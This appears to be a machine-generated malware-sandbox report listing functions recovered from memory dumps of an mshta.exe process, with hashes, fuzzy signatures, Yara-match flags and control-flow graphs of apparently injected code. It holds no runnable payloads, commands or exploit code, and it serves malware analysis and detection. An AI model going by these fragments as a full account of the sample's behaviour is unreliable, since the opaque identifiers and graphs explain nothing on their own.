                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 91cbe970b04e600f3af488c5c73f8359cfcae571d54e4ba0b7b7b4e461b84e4a
                                                                                                                                                                                                                                                • Instruction ID: 467ca5885a89a06e8346f93c23856995ca410db7e280617de4eef8bc9b732469
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91cbe970b04e600f3af488c5c73f8359cfcae571d54e4ba0b7b7b4e461b84e4a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4900221601405465540B1A88C449064045ABE2211769C162A199C550D86598969566A
                                                                                                                                                                                                                                                Function 03882FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 696a59f6e2c23fb5e116a89a41040b361159956570e35c45b67088c09c037516
                                                                                                                                                                                                                                                • Instruction ID: 98754e57e6339d1c8da3feab59ad5b51798fd94bd5aff491a68c0ea8d89bd608
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 696a59f6e2c23fb5e116a89a41040b361159956570e35c45b67088c09c037516
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A900221211C0546E600B5A84C14B07004587D1303F69C156A115C554CCA1589655526
                                                                                                                                                                                                                                                Function 03882F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 531830c3860c65a657c053a96dbe2c03dc243e157906b40d42d742c41dc639be
                                                                                                                                                                                                                                                • Instruction ID: 9a5e7ae54196efca4ca7e01967d398c9cb77d83cc081dd5bdd903a8db43987df
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 531830c3860c65a657c053a96dbe2c03dc243e157906b40d42d742c41dc639be
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7790026134140946E500B1984814B060045C7E2301F69C056E206C554D8719CD56612B
                                                                                                                                                                                                                                                Function 03882E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 8e4fd0785ee0c74b496f294aae9cb7bba70b7a997207e6bba7a35749ddb9b018
                                                                                                                                                                                                                                                • Instruction ID: 58a750924a9dab95373dc983580a80bca09a681aa3e9b0de34e367848313cc1a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e4fd0785ee0c74b496f294aae9cb7bba70b7a997207e6bba7a35749ddb9b018
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B90022160140A06E501B1984804616004A87D1241FA9C063A202C555ECB258A96A136
                                                                                                                                                                                                                                                Function 03882EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 961dc917b2907a7bd6fda115354c4c27e4b7eb5bb4be23d397d3c1f091ef44e4
                                                                                                                                                                                                                                                • Instruction ID: 23055a8cca7b272c63115f860326fea2f4c57a42d0ac551e1039d729cebeacdd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 961dc917b2907a7bd6fda115354c4c27e4b7eb5bb4be23d397d3c1f091ef44e4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A90026120180907E540B5984C04607004587D1302F69C052A306C555E8B298D55613A
                                                                                                                                                                                                                                                Function 03882DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 505dafe03cbc5d972301e88ba4a53c9c27b4e8daa9cd717bd93ec497063e5774
                                                                                                                                                                                                                                                • Instruction ID: b8e8dd9e8575d6a8236c11732db6df36f8628a343ae4da8f5e3a2ee3bf9fb237
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 505dafe03cbc5d972301e88ba4a53c9c27b4e8daa9cd717bd93ec497063e5774
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35900221242446566945F1984804507404697E12417A9C053A241C950C8626995AD626
                                                                                                                                                                                                                                                Function 03882DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 08a72708706c7824d5385e0357d9c45d59b654becba368e483c7b05cae529d02
                                                                                                                                                                                                                                                • Instruction ID: 573fe6b1c4a2ad21a76d2e23a7b24e4cd578abf9aa29a4bda61e76e89b21937e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08a72708706c7824d5385e0357d9c45d59b654becba368e483c7b05cae529d02
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4190023120140917E511B1984904707004987D1241FA9C453A142C558D97568A56A126
                                                                                                                                                                                                                                                Function 03882D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: c4f5cd264625dd611105c693652ed106fb0facbc0d8fc1f011b21564815cb059
                                                                                                                                                                                                                                                • Instruction ID: ff0743dca03a78520e4163e6e7c7338dddfe9e78dd985cdbe81da5ebb73e3f52
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4f5cd264625dd611105c693652ed106fb0facbc0d8fc1f011b21564815cb059
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6090022921340506E580B198580860A004587D2202FA9D456A101D558CCA15896D5326
                                                                                                                                                                                                                                                Function 03882D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 3871862ad2ad51c7143ed302cd1b536cba111c33ae4b4286d8561ab848886681
                                                                                                                                                                                                                                                • Instruction ID: ecb6f6c00ad718a3748361335be8eaee8720a124ac4e23b5533c2a9497061247
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3871862ad2ad51c7143ed302cd1b536cba111c33ae4b4286d8561ab848886681
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9990022130140507E540B19858186064045D7E2301F69D052E141C554CDA15895A5227
                                                                                                                                                                                                                                                Function 03882CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: bb9c96e714e33ab845fa417bfb45aa8218dd6b491441547e91aafd8f6a7c05a8
                                                                                                                                                                                                                                                • Instruction ID: 9044ef1dde016291266a624f3074fab4bf7c59486113d9c9d3f41af2e7550c01
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb9c96e714e33ab845fa417bfb45aa8218dd6b491441547e91aafd8f6a7c05a8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E590023120140906E500B5D85808646004587E1301F69D052A602C555EC76589956136
                                                                                                                                                                                                                                                Function 03882C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 9cb6865b98aab7878426a1272e688a6a4ac3a0a4df1d445fa041704e10ce0b5f
                                                                                                                                                                                                                                                • Instruction ID: 60321bf16c784710a33e8618fca29901c7592bfac4653b1b6d7d62330b87e1db
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cb6865b98aab7878426a1272e688a6a4ac3a0a4df1d445fa041704e10ce0b5f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D090023120140D46E500B1984804B46004587E1301F69C057A112C654D8715C9557526
                                                                                                                                                                                                                                                Function 03882C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: df98c8f25af10cc601d652f324a783b05d1c1bf3d5ddc6765eb8d62c2440d211
                                                                                                                                                                                                                                                • Instruction ID: 1032717efb76600c593fab23a9bb096133ed81f565210b65c6d8a95ad2131918
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df98c8f25af10cc601d652f324a783b05d1c1bf3d5ddc6765eb8d62c2440d211
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D90023120148D06E510B198880474A004587D1301F6DC452A542C658D879589957126
                                                                                                                                                                                                                                                Function 038835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 0f72b877df92c334950a766a7d2b586098a00bd2818bca801d1b7b0e23eea65e
                                                                                                                                                                                                                                                • Instruction ID: baa79bc5b7c5770eb664656ea98c7fec717879cf6c717446465393485ae928d8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f72b877df92c334950a766a7d2b586098a00bd2818bca801d1b7b0e23eea65e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE90023160550906E500B1984914706104587D1201F79C452A142C568D87958A5565A7
                                                                                                                                                                                                                                                Function 038839B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 3168f0e86fbb8659e062615fc6995fb56b4080fff3845c9f9200fa7b48118cb4
                                                                                                                                                                                                                                                • Instruction ID: a0e5d43cfc192d0dd3dfd40b9db4986f3a152a79605ddc073c0d0e43e46e4548
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3168f0e86fbb8659e062615fc6995fb56b4080fff3845c9f9200fa7b48118cb4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5890022124545606E550B19C48046164045A7E1201F69C062A181C594D865589596226
                                                                                                                                                                                                                                                Function 02F30B3B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116threadwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 495 2f30b3b-2f30b43 496 2f30bc2 495->496 497 2f30b45-2f30b5a 495->497 498 2f30bc4-2f30bc7 496->498 497->498 499 2f30b5c-2f30b61 497->499 500 2f30b63-2f30b68 499->500 501 2f30bcd-2f30bfc call 2f4b270 call 2f4bc80 499->501 503 2f30b13-2f30b19 500->503 504 2f30b69-2f30b70 500->504 518 2f30bff-2f30c37 call 2f34310 call 2f21410 call 2f419d0 501->518 506 2f30b1b-2f30b35 503->506 507 2f30aad-2f30ac4 503->507 504->504 508 2f30b72-2f30b75 504->508 512 2f30b11 506->512 513 2f30b37-2f30b39 506->513 510 2f30b12-2f30b14 507->510 511 2f30ac6-2f30b07 507->511 523 2f30b16-2f30b19 510->523 524 2f30a9a-2f30aa4 510->524 514 2f30b7a-2f30b81 511->514 520 2f30b09-2f30b0e 511->520 512->510 513->514 517 2f30b83-2f30b8a 514->517 514->518 517->518 530 2f30c57-2f30c5d 518->530 531 2f30c39-2f30c48 PostThreadMessageW 518->531 520->512 523->506 523->507 531->530 532 2f30c4a-2f30c54 531->532 532->530
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(4-4-J4,00000111,00000000,00000000), ref: 02F30C44
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 1836367815-3753321779
                                                                                                                                                                                                                                                • Opcode ID: 8d42cc8b50f657f9c2372d63b86eb34a7f3e310de71b39c190ba5e258f8f4fb6
                                                                                                                                                                                                                                                • Instruction ID: da7a11e31e6224a490675bb001afe59ac5e3c524cb1a8ef181a1a8595bee4a3f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d42cc8b50f657f9c2372d63b86eb34a7f3e310de71b39c190ba5e258f8f4fb6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7319971D0114D7ADB139AE48C80AEF7F6D9F426D8F04416DEA84A7181EB65C90B8BE1
                                                                                                                                                                                                                                                Function 02F30AFF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 533 2f30aff-2f30b07 534 2f30b7a-2f30b81 533->534 535 2f30b09-2f30b0e 533->535 536 2f30b83-2f30b8a 534->536 537 2f30bff-2f30c37 call 2f34310 call 2f21410 call 2f419d0 534->537 538 2f30b11 535->538 536->537 553 2f30c57-2f30c5d 537->553 554 2f30c39-2f30c48 PostThreadMessageW 537->554 540 2f30b12-2f30b14 538->540 545 2f30b16-2f30b19 540->545 546 2f30a9a-2f30aa4 540->546 548 2f30b1b-2f30b35 545->548 549 2f30aad-2f30ac4 545->549 548->538 552 2f30b37-2f30b39 548->552 549->540 550 2f30ac6-2f30acc 549->550 550->533 552->534 554->553 555 2f30c4a-2f30c54 554->555 555->553
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 0-3753321779
                                                                                                                                                                                                                                                • Opcode ID: f2a36c6f5606dab75a0018f6093e94cd8ebda11e2a610de02f05f61c453fe42e
                                                                                                                                                                                                                                                • Instruction ID: e47e23f9a4081fa9c1b1dbbd857dfb8d45f7928b23dbc685b132e7d03dde0ed2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2a36c6f5606dab75a0018f6093e94cd8ebda11e2a610de02f05f61c453fe42e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F121DF65901049BE9B139AA6DC819EF7BACEEC12C4B14806EE680DB001EB25DC0B87D0
                                                                                                                                                                                                                                                Function 02F30BC8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(4-4-J4,00000111,00000000,00000000), ref: 02F30C44
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 1836367815-3753321779
                                                                                                                                                                                                                                                • Opcode ID: 5feac335c7e91d9c860bcdeecebe03c69be0b9e6f01109e2c9497186c7478fa8
                                                                                                                                                                                                                                                • Instruction ID: 405da1a91c521c6cf4fc00dbe36507b1e263eb13f1c159e5f36ce95044275717
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5feac335c7e91d9c860bcdeecebe03c69be0b9e6f01109e2c9497186c7478fa8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F118271D0125CBADB12ABE1DC81DEF7B7CDF416D8F048169FA0467141D6785E0A8FA2
                                                                                                                                                                                                                                                Function 02F30B8F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

